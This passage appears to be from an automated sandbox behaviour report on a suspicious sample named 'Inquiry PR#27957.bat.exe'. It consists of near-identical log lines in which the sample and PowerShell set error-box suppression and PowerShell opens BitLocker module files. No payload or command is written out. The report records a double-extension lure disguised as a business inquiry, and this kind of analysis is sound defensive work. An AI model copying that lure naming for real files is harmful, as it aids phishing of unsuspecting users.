            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
